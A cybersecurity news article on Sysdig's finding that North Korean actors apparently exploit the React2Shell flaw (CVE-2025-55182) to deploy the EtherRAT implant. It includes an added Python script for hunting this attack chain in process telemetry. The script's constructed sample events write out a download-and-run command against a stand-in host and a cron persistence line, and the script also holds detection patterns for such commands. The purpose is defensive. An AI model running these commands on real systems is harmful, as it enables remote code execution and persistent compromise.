Some of the attacks exploiting the recently emerged React vulnerability dubbed React2Shell appear to have been conducted by North Korean threat actors, according to cybersecurity firm Sysdig.
The React2Shell vulnerability, officially tracked as CVE-2025-55182, can be exploited for unauthenticated remote code execution. The flaw impacts version 19 of the React open source library for creating application user interfaces.
In addition to React, CVE-2025-55182 impacts other related frameworks, including Next.js, Waku, React Router, and RedwoodSDK.
While React powers millions of applications, the actual number of vulnerable instances appears to be relatively small, with the Shadowserver Foundation seeing roughly 70,000 affected systems.
The existence of React2Shell came to light on December 3 and in-the-wild exploitation commenced shortly after.
Based on the currently available information, China-linked threat groups were the first to exploit the vulnerability. Exploitation soon surged, with the cybersecurity community seeing attacks involving AWS credential theft, malware deployment (botnets), and cryptocurrency miners.
Sysdig has observed sophisticated attacks involving the deployment of EtherRAT, which the company described as a persistent access implant “that combines techniques from at least three documented campaigns into a single, previously unreported attack chain.”
“EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org,” the security firm explained. “This combination of capabilities has not been previously observed in React2Shell exploitation.”
Sysdig’s analysis unearthed overlaps with the North Korea-linked campaign dubbed Contagious Interview, in which threat actors deliver malware to people associated with cryptocurrency and blockchain technologies through fake job interviews. The ultimate goal of the campaign is the theft of cryptocurrency from victims.
In the EtherRAT attack, React2Shell is exploited to execute a shell command for downloading and executing a shell script designed to deploy a JavaScript implant. This implant is a dropper that decrypts the main payload, EtherRAT.
“The encrypted loader pattern used in EtherRAT closely matches the DPRK-affiliated BeaverTail malware used in the Contagious Interview campaigns,” Sysdig said.
It added, “Notably, while Lazarus Group and other DPRK-affiliated threat actors historically bundle Node.js with their payloads, the sample we identified downloads Node.js from the official nodejs.org distribution. This represents a significant evolution in tradecraft: trading a smaller payload size for reduced detection risk.”
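The chain the article describes (a server-side React process spawning a shell, a download-and-run script, a Node.js runtime fetched from nodejs.org, then persistence) is something a defender can hunt for in process-execution telemetry. The script below is an added example written for this page; it is not Sysdig's detection content and not derived from EtherRAT samples. It assumes each telemetry line is a JSON object with `ts`, `host`, `parent_comm`, `comm` and `cmdline` fields (an assumed schema), the server process names and shells it watches are assumptions, and the persistence paths it checks are generic Linux locations chosen for illustration, since the article does not enumerate EtherRAT's five mechanisms. The sample events are constructed, not captured from a real compromise.

```python
"""Hunt for a React2Shell-style process chain in process-exec telemetry.

Added example for this article, not Sysdig's or EtherRAT's code. Assumes
each line is JSON with 'ts', 'host', 'parent_comm', 'comm', 'cmdline'
(an assumed schema); all sample events below are constructed.
"""
import json
import re
from typing import Dict, List

# Server-side worker names that should not need to spawn a shell on a
# hardened deployment (assumption: typical Node/Next.js process names).
SERVER_COMMS = {"node", "next-server", "npm"}
SHELLS = {"sh", "bash", "dash", "zsh"}

# Download-and-run pattern from the reported chain (fetch a script, pipe to sh).
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
# Node.js runtime fetched from the official host named in the report.
NODE_RUNTIME_FETCH = re.compile(r"\b(curl|wget)\b.*https?://nodejs\.org/")
# Generic Linux persistence locations (assumption: the article does not list
# EtherRAT's five mechanisms, so these are common places to watch, not IOCs).
PERSISTENCE_PATHS = re.compile(
    r"(/etc/cron\.d/|/etc/systemd/system/|/\.config/systemd/user/|"
    r"/\.bashrc|/\.profile|/etc/rc\.local|/etc/ld\.so\.preload)"
)


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules an event matches (empty list = benign)."""
    hits: List[str] = []
    parent = event.get("parent_comm", "")
    comm = event.get("comm", "")
    cmd = event.get("cmdline", "")
    if parent in SERVER_COMMS and comm in SHELLS:
        hits.append("server_spawned_shell")      # exploitation step
    if DOWNLOAD_EXEC.search(cmd):
        hits.append("download_and_execute")      # stager script
    if NODE_RUNTIME_FETCH.search(cmd):
        hits.append("node_runtime_fetch")        # runtime pulled from nodejs.org
    if PERSISTENCE_PATHS.search(cmd):
        hits.append("persistence_path_touch")    # persistence setup
    return hits


def hunt(lines: List[str]) -> List[Dict[str, object]]:
    """Parse telemetry lines and return only the events with at least one hit."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed telemetry instead of aborting the hunt
        hits = classify(ev)
        if hits:
            findings.append({
                "ts": ev.get("ts"),
                "host": ev.get("host"),
                "cmdline": ev.get("cmdline"),
                "rules": hits,
            })
    return findings


# Constructed sample telemetry (hosts, IPs, paths and versions are made up).
SAMPLE_LINES = [
    '{"ts":"2025-12-05T10:00:01Z","host":"web-1","parent_comm":"systemd",'
    '"comm":"node","cmdline":"node server.js"}',
    '{"ts":"2025-12-05T10:02:17Z","host":"web-1","parent_comm":"node",'
    '"comm":"sh","cmdline":"sh -c \\"curl -s http://198.51.100.23/x.sh | sh\\""}',
    '{"ts":"2025-12-05T10:02:19Z","host":"web-1","parent_comm":"sh",'
    '"comm":"curl","cmdline":"curl -fsSL https://nodejs.org/dist/v22.0.0/'
    'node-v22.0.0-linux-x64.tar.xz -o /tmp/.n.tar.xz"}',
    '{"ts":"2025-12-05T10:02:25Z","host":"web-1","parent_comm":"sh",'
    '"comm":"sh","cmdline":"sh -c \\"echo @reboot root /tmp/.cache/run.sh'
    ' >> /etc/cron.d/update\\""}',
    '{"ts":"2025-12-05T10:05:00Z","host":"web-1","parent_comm":"bash",'
    '"comm":"curl","cmdline":"curl -s https://api.example.com/health"}',
    'not json at all',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LINES):
        print(f["ts"], f["host"], f["rules"], "::", f["cmdline"])
```

Each rule on its own is noisy (an operator may legitimately fetch a Node tarball), which is why the script reports all matching rule names per event: the combination of a server worker spawning a shell, a pipe-to-shell download and a nodejs.org fetch within minutes on one host is the sequence worth escalating, while a lone health-check curl is ignored.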
While the uncovered evidence seems to point to Lazarus or a different North Korean threat actor exploiting React2Shell as the initial delivery vector (as a replacement for fake job interviews), the security firm admits it’s also possible that “another sophisticated actor may be combining techniques from multiple documented campaigns to complicate attribution”.